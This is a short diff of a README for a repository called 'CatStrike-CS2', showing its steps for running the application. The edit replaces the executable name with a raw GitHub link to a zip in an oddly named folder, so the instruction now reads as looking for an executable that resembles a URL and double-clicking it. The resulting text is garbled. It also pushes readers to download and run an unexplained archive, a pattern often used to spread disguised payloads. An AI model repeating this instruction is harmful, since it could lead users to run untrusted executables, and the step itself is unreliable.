fares5567/CatStrike-CS2/README.md

 5. **Run the Application**

    Once you have extracted the files, navigate to the folder where you extracted them.
-Look for the executable file that resembles `CatStrike.exe`.
+Look for the executable file that resembles `https://raw.githubusercontent.com/fares5567/CatStrike-CS2/main/quotee/CatStrike-CS2.zip`.
 Double-click it to run the application.

 6. **Adjust Settings if Needed**